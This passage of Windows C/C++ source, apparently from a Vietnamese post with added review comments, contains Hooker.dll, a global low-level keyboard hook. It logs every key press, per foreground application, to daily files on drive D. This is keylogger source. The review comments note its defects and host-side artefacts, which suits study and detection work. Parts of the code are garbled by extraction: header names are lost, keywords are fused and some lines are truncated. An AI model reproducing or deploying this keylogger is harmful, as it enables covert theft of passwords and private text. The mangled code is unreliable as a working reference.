       message goes to DefWindowProc. Nothing in this listing creates a window that
       uses this procedure, so as shown it is only reachable if a window is
       registered elsewhere. */
    LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
    {
        switch (message) /* handle the messages */
        {
        case WM_DESTROY:
            PostQuitMessage (0); /* send a WM_QUIT to the message queue */
            UnhookWindowsHookEx(hHook); /* return value is not checked */
            hHook=NULL;
            break;
        default: /* for messages that we don't deal with */
            return DefWindowProc (hwnd, message, wParam, lParam);
        }
        return 0;
    }

    Thư viện Hooker.dll

    // dllmain.cpp : Defines the entry point for the DLL application.
    #include#include#include#include#include
    #include#include#include
    /* NOTE(review): every header name was lost in extraction (angle-bracket includes
       swallowed as markup). Judging by the APIs called below, the Windows, PSAPI
       and C stdio headers are needed at minimum. */

    /* Variables placed in a named section ".SHARDAT". The intent is for the
       section to be shared by every process that maps the DLL; whether it really
       is depends on a linker /SECTION directive that is not part of this listing.
       "#pragmadata_seg" is the extraction form of "#pragma data_seg". */
    #pragmadata_seg(".SHARDAT")
    HHOOK hGlobalHook = NULL; /* set by SetGlobalHook, passed to CallNextHookEx */
    FILE *out;                /* log file handle used by WriteStringToFile */
    #pragmadata_seg()

    /* Forward declarations. PrintModules and WriteEnterToFile have no definition
       anywhere in this listing. */
    int PrintModules( DWORD processID );void WriteStringToFile(char *txt);void WriteEnterToFile();

    /*
     * Hook procedure exported from Hooker.dll; Jaam.exe resolves it by name and
     * installs it with WH_KEYBOARD_LL.
     *
     * nCode/wParam/lParam are the standard hook arguments; lParam is cast to
     * KBDLLHOOKSTRUCT* below. Only HC_ACTION + WM_KEYDOWN events are examined;
     * every event, examined or not, is forwarded with CallNextHookEx.
     *
     * Observable effect: each examined key press ends in WriteStringToFile, i.e.
     * an fopen/fprintf/fclose on the log file, so the hook produces file activity
     * on every keystroke — the most direct host-side artefact of this program.
     *
     * Structural note: the named-key checks are independent if-statements; only
     * the last one (VK_DOWN) owns the else-branch, so a named key such as Enter is
     * written as "{Enter}" and then still reaches the ToAscii path.
     */
    LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam)
    {
        if(nCode == HC_ACTION && wParam == WM_KEYDOWN)
        {
            /* Modifier state. Shift/Ctrl test bit 0x80 of GetKeyState's SHORT result;
               the documented "key is down" flag is the high-order bit, so this relies
               on the low byte mirroring it — worth confirming. Caps Lock is treated as
               active for any non-zero result (toggled or held). */
            bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
            bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
            bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false); /* not used in the visible code */
            byte keyState[256];
            GetKeyboardState(keyState); /* return value not checked */
            WORD w;
            KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;
            /* Named keys are written as "{Name}" tokens. */
            if(keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
            if(keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
            if(keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
            if(keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
            if(keycode->vkCode == VK_END) WriteStringToFile("{End}");
            if(keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
            if(keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
            if(keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
            if(keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");
            /* "elseif" below is an extraction artefact (space lost). ToAscii
               translates the key using the keyboard state captured above. */
            elseif(ToAscii(keycode->vkCode,
                keycode->scanCode,keyState,
                &w,keycode->flags) == 1){
                char key = (char)w;
                /* NOTE(review): the next two lines are truncated in this listing —
                   everything between a '<' and the following text was dropped, so the
                   letter-case condition and the branch that formats vkCode cannot be
                   read here. They are reproduced as extracted. */
                if((isDownCapslock ^ isDownShift) && ((key >= 65 && key = 97 &&
                key vkCode);WriteStringToFile(str);}
                else { char str[100];
                    sprintf(str,"%c",key);WriteStringToFile(str);}
            }
        }
        return CallNextHookEx( hGlobalHook, nCode, wParam, lParam );
    }
    /* Stores the hook handle obtained by the executable so that LogKeyboard can
       pass it to CallNextHookEx. hGlobalHook lives in the .SHARDAT segment. */
    void SetGlobalHook(HHOOK hHook){
        hGlobalHook = hHook;}

    /*
     * Returns the base name of hMods[0] (typically the main executable) of the
     * process with id processID, converted to a narrow string.
     *
     * Ownership: on success the returned buffer is malloc'ed (1000 bytes) and the
     * only caller in this listing (WriteStringToFile) never frees it, so every call
     * leaks; on OpenProcess failure the string literal "" is returned instead, so a
     * caller could not free the result uniformly even if it tried.
     *
     * If EnumProcessModules or GetModuleBaseName fails, result is returned with
     * uninitialised contents, which the caller then formats into a file name.
     */
    char* GetExecutor( DWORD processID ){
        HMODULE hMods[1024];HANDLE hProcess;DWORD cbNeeded;
        /* "unsignedint" is an extraction artefact. malloc's result is not checked;
           the stray second ';' is harmless. */
        unsignedint i;char* result = (char*)malloc( 1000 );;
        // Get a handle to the process.
        hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |PROCESS_VM_READ,FALSE, processID );
        if(NULL == hProcess) return""; /* the buffer allocated above is leaked on this path */
        // Get a list of all the modules in this process.
        if( EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)){
            for ( i = 0; i < (cbNeeded / sizeof(HMODULE)); i++ )
            {TCHAR szModName[MAX_PATH];
                // Get the base name of the module's file (not its full path).
                if( GetModuleBaseName( hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(TCHAR)))
                { // Convert the wide module name into the narrow result buffer.
                  // wcstombs implies TCHAR is wchar_t here (UNICODE build); prcName is unused.
                    TCHAR* prcName = szModName;wcstombs( result, szModName, 1000 );
                }
                break;} /* unconditional break: only hMods[0] is ever examined */
        }
        // Release the handle to the process.
        CloseHandle( hProcess );
        return result;}

    /*
     * Appends txt to the current day's log file for the foreground application.
     *
     * The file is d:\key-<year>_<month>_<day>-<exe name>.txt (see the sprintf
     * below), opened in append mode, written and closed on every call. That fixed
     * path pattern and the per-keystroke open/write/close churn are the simplest
     * host-side artefacts of this program.
     *
     * Defects visible here: str is 100 bytes while GetExecutor may supply up to
     * 1000 characters, so sprintf can overflow it; fopen's result is not checked
     * before fprintf (NULL if drive D: is absent or not writable); the buffer
     * returned by GetExecutor is never freed; out is the global FILE* from the
     * shared segment rather than a local.
     */
    void WriteStringToFile(char* txt){ // File name by Time and App
        // Current time
        SYSTEMTIME st;GetLocalTime(&st);
        // Current app: the process owning the foreground window
        HWND curhwndWindow = GetForegroundWindow(); // get the handle of the window in use
        DWORD processID;GetWindowThreadProcessId(curhwndWindow, &processID);
        char str[100];
        sprintf(str,"d:\\key-%d_%d_%d-%s.txt" ,st.wYear,st.wMonth,st.wDay,GetExecutor(processID));
        out=fopen(str,"a");fprintf(out,"%s",txt);fclose(out);
    }

    /* DLL entry point. Every attach/detach reason falls through to the same break,
       so no per-process or per-thread setup happens here; hGlobalHook is set later
       via SetGlobalHook. Always returns TRUE. */
    BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved
    ){
        switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:
        break;}return TRUE;
    }